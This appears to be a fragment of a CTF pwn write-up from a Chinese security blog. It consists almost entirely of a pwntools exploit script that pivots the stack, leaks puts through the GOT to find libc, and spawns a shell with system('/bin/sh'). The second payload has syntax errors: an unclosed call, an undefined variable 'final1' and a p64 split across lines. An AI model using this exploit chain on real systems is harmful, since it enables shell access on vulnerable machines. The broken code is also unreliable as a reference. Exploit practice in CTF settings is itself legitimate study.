final = 0x00609000 - 0x200
final2 = final+0x100
payload = b'a'*(5+8)
+p64(final)+p64(pop_rdi)+p64(puts_got)+p64(puts_plt)+p64(pop_rdi)+p64(0)+p64(pop_rsi)+p64(
final)+p64(0)+p64(read_plt)+p64(leve_ret)
payload = payload.ljust(109,b'b')
p.send(payload)
p.recvline()
puts_addr = u64(p.recvuntil('\n')[:-1].ljust(8,b'\x00'))
log.info(hex(puts_addr))
libc_base = puts_addr - 0x80aa0
gadget = libc_base + 0x4f3d5
system = libc_base + 0x4f550
bin_sh = libc_base + 0x1b3e1a
payload2 = p64(final1,p64(pop_rdi)+p64(bin_sh)+p64(ret)+p64(system)+p64(read_plt)+p64(final1)+p64(0)+p
64(buf2)+p64(100)
p.sendline(payload2)
p.interactive()

你可能感兴趣的:(web安全,安全)